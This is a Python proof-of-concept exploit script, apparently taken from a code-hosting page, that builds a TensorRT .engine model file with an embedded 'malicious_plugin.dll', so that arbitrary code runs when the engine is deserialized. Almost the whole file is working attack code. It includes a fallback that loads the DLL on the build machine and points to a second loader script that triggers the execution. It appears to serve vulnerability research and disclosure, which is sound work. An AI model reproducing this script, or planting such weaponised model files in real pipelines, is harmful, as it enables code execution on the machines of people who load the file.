File size: 4,554 Bytes
a86b88f
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
"""
TensorRT ACE PoC - Step 1: Build a malicious .engine file with embedded plugin DLL.

This script:
1. Creates a simple identity network using TensorRT's network API
2. Serializes the malicious plugin DLL into the engine file via plugins_to_serialize
3. Saves the resulting .engine file

The .engine file will contain the embedded DLL that executes arbitrary code
when deserialized by TensorRT.
"""

import os
import sys
import tensorrt as trt

def _build_identity_network(builder):
    """Create an explicit-batch network that copies ``input`` straight to ``output``.

    Args:
        builder: a ``trt.Builder`` used to create the network.

    Returns:
        The populated network definition, or ``None`` if the builder could not
        create one.
    """
    network = builder.create_network(
        1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH)
    )
    if network is None:
        return None

    input_tensor = network.add_input("input", trt.float32, (1, 3, 32, 32))
    identity = network.add_identity(input_tensor)
    identity.get_output(0).name = "output"
    network.mark_output(identity.get_output(0))
    return network


def _make_builder_config(builder, plugin_path):
    """Create a builder config with a 1 MiB workspace that serializes *plugin_path*.

    Args:
        builder: the ``trt.Builder`` that will consume the config.
        plugin_path: filesystem path of the plugin library to embed.

    Returns:
        The configured ``IBuilderConfig``.
    """
    config = builder.create_builder_config()
    config.set_memory_pool_limit(trt.MemoryPoolType.WORKSPACE, 1 << 20)  # 1MB
    config.plugins_to_serialize = [plugin_path]
    return config


def build_malicious_engine():
    """Build an identity-network engine with ``malicious_plugin.dll`` embedded.

    Reads ``malicious_plugin.dll`` from this script's directory. On success it
    writes ``malicious_model.engine`` next to it.

    If the first build fails, it retries once after calling
    ``load_library`` on the plugin. That call loads the DLL into this
    process as well.

    Returns:
        True if the engine was built and written, False otherwise.
    """
    script_dir = os.path.dirname(__file__)
    plugin_dll = os.path.join(script_dir, "malicious_plugin.dll")
    engine_file = os.path.join(script_dir, "malicious_model.engine")

    if not os.path.exists(plugin_dll):
        print(f"ERROR: Plugin DLL not found: {plugin_dll}")
        return False

    logger = trt.Logger(trt.Logger.VERBOSE)

    builder = trt.Builder(logger)
    if builder is None:
        print("ERROR: Failed to create builder")
        return False

    # NOTE: load_library() is skipped here; plugins_to_serialize makes
    # TensorRT read the library file from disk at build time.
    dll_size = os.path.getsize(plugin_dll)
    print(f"[*] Plugin DLL: {plugin_dll} ({dll_size} bytes)")

    network = _build_identity_network(builder)
    if network is None:
        print("ERROR: Failed to create network")
        return False
    print("[*] Simple identity network created")

    print(f"[*] Setting plugins_to_serialize: {plugin_dll}")
    config = _make_builder_config(builder, plugin_dll)

    print("[*] Building engine (this may take a moment)...")
    serialized_engine = builder.build_serialized_network(network, config)
    if serialized_engine is None:
        print("ERROR: Failed to build serialized engine")
        print("[*] Trying approach 2: load_library first, then serialize...")

        # WARNING: load_library() loads the DLL into *this* process. Per the
        # original note this triggers its DllMain, so whatever the library
        # does on load also happens on the build machine.
        registry = builder.get_plugin_registry()
        handle = registry.load_library(plugin_dll)
        print(f"[*] load_library result: {handle}")

        # Rebuild from scratch with a fresh builder, network and config.
        retry_builder = trt.Builder(logger)
        if retry_builder is None:
            print("ERROR: Failed to create builder")
            return False
        retry_network = _build_identity_network(retry_builder)
        if retry_network is None:
            print("ERROR: Failed to create network")
            return False
        retry_config = _make_builder_config(retry_builder, plugin_dll)

        serialized_engine = retry_builder.build_serialized_network(
            retry_network, retry_config
        )
        if serialized_engine is None:
            print("ERROR: Still failed to build engine")
            return False

    engine_size = serialized_engine.nbytes
    print(f"[+] Engine built successfully! Size: {engine_size} bytes")

    # Heuristic only: an engine larger than the plugin file suggests the
    # library bytes were embedded. This does not prove it.
    print(f"[*] Plugin DLL size: {dll_size} bytes")
    if engine_size > dll_size:
        print("[+] Engine is larger than DLL - DLL likely embedded!")
    else:
        print("[-] Engine seems too small - DLL might not be embedded")

    with open(engine_file, "wb") as f:
        f.write(bytes(serialized_engine))
    print(f"[+] Malicious engine saved to: {engine_file}")

    return True


if __name__ == "__main__":
    # Start from a clean slate: drop any proof file left by a previous run.
    proof_path = os.path.join(os.path.dirname(__file__), "PWNED.txt")
    if os.path.exists(proof_path):
        os.remove(proof_path)

    ok = build_malicious_engine()
    if not ok:
        print("\n[-] STEP 1 FAILED")
        sys.exit(1)

    print("\n[+] STEP 1 COMPLETE: Malicious engine built.")
    print("[*] Next: Run load_malicious_engine.py to test ACE")
    sys.exit(0)